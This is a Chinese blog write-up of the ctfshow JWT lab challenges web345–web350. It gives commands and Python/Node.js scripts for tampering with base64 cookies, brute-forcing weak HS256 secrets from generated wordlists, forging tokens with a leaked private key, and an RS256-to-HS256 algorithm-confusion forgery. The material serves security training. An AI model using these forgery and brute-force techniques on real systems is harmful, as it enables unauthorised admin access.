ctfshow web入门 jwt web345~web350

已于 2022-09-13 20:10:16 修改
阅读量767 收藏
点赞数
分类专栏: ctfshow 文章标签: 前端 php web安全 服务器
于 2022-09-13 19:23:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62989306/article/details/126839765
版权

目录

学习链接

web345

cookie值是base64,直接base64解密,把user改为admin,然后再base64加密,放入cookie。

然后访问/admin/

web346

https://jwt.io/

把cookie值放到上面的网站里解码,把user改为admin,然后猜测秘钥是123456,把之后的base64的jwt传入cookie,然后访问/admin/。

web347

使用pydictor,生成6位数字的字典。

 python .\pydictor.py -base d --len 1 6 -o nums.txt

然后跑脚本:

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-05-06 16:34:57
# @Last Modified by:   h1xa
# @Last Modified time: 2021-05-06 19:34:42
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

import jwt
import json

def runblasting(path,jwt_str,alg):
    if alg == "none":
       alg = "HS256"
    with open(path,encoding='utf-8') as f:
        for line in f:
            key_ = line.strip()
            print('use '+key_)
            try:
                jwt.decode(jwt_str,verify=True,key=key_,algorithms=alg)
                print('found key! --> ' +  key_)
                break
            except(jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):
                print('found key! --> ' +  key_)
                break
            except(jwt.exceptions.InvalidSignatureError):
                continue
        else:
            print("key not found!")

if __name__ == '__main__':
    runblasting('nums.txt','eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTYyNzg3NjQ4MCwiZXhwIjoxNjI3ODgzNjgwLCJuYmYiOjE2Mjc4NzY0ODAsInN1YiI6InVzZXIiLCJqdGkiOiJjMGYzODkwMmE1ODE4ZjhlMjM5Yzg3N2EwNzZmNmU5MCJ9.o68KTTbu7V2enU4dXXASeJs6rJbNbVbLtoEqC_WMqBo','HS256')

得到key是123456,在 https://jwt.io/ 改admin,输入秘钥123456,然后发送cookie,访问/admin/ 。

web348

生成1~4位的小写字母字典。

python .\pydictor.py -base L --len 1 4 -o keys.txt

用上面的脚本,爆破得秘钥aaab

然后在网站换admin。

web349

利用私钥生成jwt,利用公钥解密jwt,所以我们只要有私钥然后自己重新生成就可以了。

访问 /private.key 得到私钥。

运行下面的js代码生成jwt (需要安装jsonwebtoken库 npm install jsonwebtoken --save)。

const jwt = require('jsonwebtoken');
var fs = require('fs');
var privateKey = fs.readFileSync('private.key');
var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'RS256' });
console.log(token)

修改cookie后post方式访问就可以得到flag。

或者python代码得到jwt:

import jwt
public = open('private.key', 'r').read()
payload={"user":"admin"}
print(jwt.encode(payload, key=public, algorithm='RS256'))

web350

访问/public.key获得公钥。

将RS256算法改为HS256(非对称密码算法=>对称密码算法)

const jwt = require('jsonwebtoken');
var fs = require('fs');
var privateKey = fs.readFileSync('public.key');
var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'HS256' });
console.log(token)
kikkeve
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
WebApiDemo(net6+swagger+jwt)
05-31
1、框架是net6 2、包含了jwt 3、接口是swagger 4、vs2022
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 3890
ctfshow 靶场 web入门 sql注入系列
CTFShow-WEB入门篇--信息搜集详细Wp
Aluxian_的博客
06-02 2149
CTFShow-WEB入门篇--信息搜集详细Wp
ctfshow-XXE(web373-web378)_ctfshow373
最新发布
2401_84970250的博客
05-16 255
能编码简单理解就是(我的理解)input获取到数据后 先绕过正则 然后在操作xml的时候这个对象就能识别出是xml 因为xml支持utf-16 这时哪怕在xml声明编码方式为utf-8这也无所谓 这声明的只是xml内容为utf-8 但是整体过来是utf-16 这个对象是能识别出来的 然后看到这个声明为utf-8后再将内容设为utf-8的编码方式。使用一个不同的方式吧(原理都是一个意思) 为什么要绕一圈呢,就是因为在请求的时候 默认不允许将本地文件发送到dtd文件 间接的影响了我们的请求 所以要套一层。
Ctfshow web入门 JWTweb345-web350 详细题解 全
Jay17的博客
08-02 2086
Ctfshow web入门 JWTweb345-web350 详细题解 全
JWT漏洞(ctfshow345-350)
m0_67284865的博客
07-09 278
JWT 可以使用密钥(使用 HMAC 算法)或使用 RSA 的公钥/私钥对进行签名。当用户登录某一页面是,服务端会把一段加密的数据返回,相当于代替cookie作用,当下一次打开此登录页面时,客户端会将这一段自动发送给服务器端,服务器端根据收到的这一段数据,返回不同的页面,基本功能与cookie类似。这里盲猜123456,然后把user改成admin,用修改后的jwt加载进入,访问admin目录就可以了。得到密钥,然后user改成admin,密钥aaab,得到jwt载入,访问admin得到flag。
ctfshow web349 jwt非对称加密 源码泄露
c1516175954的博客
09-20 77
执行后得到伪造的jwt,然后post发包(源码里说,这样才能解密)可以看到私钥加密,访问当前目录/private.key,下载私钥。写个python脚本,做jwt
ctfshow JWT (Web345-350)
weixin_63231007的博客
11-08 1650
用户登录成功后,服务端生成一个随机token给用户,并且在服务端(数据库或缓存)中保存一份token,以后用户再来访问时需携带token,服务端接收到token之后,去数据库或缓存中进行校验token的是否超时、是否合法。用户登录成功后,服务端通过jwt生成一个随机token给用户(服务端无需保留token),以后用户再来访问时需携带token,服务端接收到token之后,通过jwt对token进行校验是否超时、是否合法。执行得到 构造好的JWT,放入cookie中POST发包,得到flag。
ctfshow-web345 jwt空加密算法
c1516175954的博客
09-20 109
抓包发送到decoder解码- iss: 签发者是admin- iat/nbf: 签发时间是1695185318- exp: 过期时间是1695192518- sub: 面向用户user- jti: JWT唯一标识符改sub的值为admin然后直接加密用这个发包访问/admin/
web api JWT token认证
04-24
web api JWT token认证 Demo 代码,包含跨域访问 api设置。
Net.WebApi_JWT.zip
09-11
.Net WebAPi 下实现Swagger接口文档、JWT身份验证、autofac的注入, EF DBFirst机制,DDD模式,SQLServer数据库
.net core webapi jwt 更为清爽的认证详解
10-16
主要介绍了.net core webapi jwt 更为清爽的认证详解,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
.NET6平台开发WebApi-使用JWT进行用户鉴权和测试源码
02-21
1.用.Net6平台WebApi项目开发 2.使用jwt给用户颁发密钥 3.swagger验证配置 4.接口jwt验证密钥方法 5.运行就能使用
离线图形化JWT加解密爆破工具JWT_GUI(ctfshowweb345——350
Aiyflwoers的博客
07-24 2266
基于pyqt5和pyjwt实现的jwt加解密爆破一体化工具(ps:其实是水的python课设 ps2:发现最新用处,在全内网的线下赛中,收手机,出不去外网,出到jwt题目不会写脚本直接gg,该款工具就能派上用场hhh,也许有用~) 功能自己研究吧,图形化的应该一看就清楚。RS加密就是加密RS HS加密就是加密HS 注意算法选择和加密必须对应上,对应不上会报错。爆破:纯数字爆破不用设置字典,点击就可以,纯字母爆破其实是同目录下存在弱口令字典由于针对ctf比赛,一般我们是进行jwt篡改。
ctf.show的JWT(web345-web350)
wanan的博客
09-03 728
ctf.show的JWT(web345-web350)
Spring cloud入门-OAuth 2.0(四)授权之基于JWT完成单点登录
weixin_42324034的博客
11-02 1282
授权之基于JWT完成单点登录摘要单点登录简介创建oauth2-client网页单点服务验证服务调用验证 摘要 Spring Cloud Security 为构建安全的SpringBoot应用提供了一系列解决方案,结合Oauth2可以实现单点登录功能,本文将对其单点登录用法进行详细介绍。 单点登录简介 单点登录简称SSO,只的是当有多个系统需要登录时,用户只需要登录一个系统就无须登录其他的系统 创建oauth2-client 这里新建一个oauth2-client作为客服端,使用oauth2-jwt-ser
CTFshow刷题日记-WEB-JWT(web345-350)
Love&Share
09-22 1927
JWT JWT(json web token),令牌以紧凑的形式由三部分组成,这些部分由点(.)分隔 Header Payload Signature header示例 { 'typ': 'JWT', 'alg': 'HS256' } # typ:声明类型 # alg:声明加密的算法 通常直接使用 HMAC SHA256 需要注意的是因为header部分是固定的所以,生成的base64也是固定的以eyJh开头的 payload示例 { "sub": "1234567890", "nam
jwt学习
qq_44657899的博客
09-08 722
文章目录jwt基础ctfshow-web345jwt密钥爆破)ctfshow-web348使用hashcat爆破 jwt基础 JWT是JSON Web Token的缩写,它是一串带有声明信息的字符串,由服务端使用加密算法对信息签名,以保证其完整性和不可伪造性。Token里可以包含所有必要的信息,这样服务端就无需保存任何关于用户或会话的信息了。JWT可用于身份认证,会话状态维持以及信息交换等任务。 JSON Web 令牌结构 JSON Web令牌以紧凑的形式由三部分组成,这些部分由点(.)分隔,分别是: 头
ctfshow web入门 jwt(持续更新)
Lum1n0us's Blog
08-02 1218
文章目录基础知识web345web346-347web348 基础知识 jwt是由三部分构成的,第一部分是头部(header),第二部分是载荷(payload),第三部分为签证(signature) 头部 头部声明了类型和加密方法,如下 { 'typ': 'JWT', 'alg': 'HS256' } 然后将头部进行base64加密后去掉=号,构成第一部分 ewogICd0eXAnOiAnSldUJywKICAnYWxnJzogJ0hTMjU2Jwp9 载荷 和头部结构类似,但存放的是数
WEB API JWT
05-30
JWT (JSON Web Token) 是一种用于身份验证的开放标准。在 Web API 中使用 JWT 可以实现无状态的身份验证,避免了在服务器端存储会话状态或使用数据库进行身份验证的需要。JWT 由三个部分组成:头部、载荷和签名。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kikkeve

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值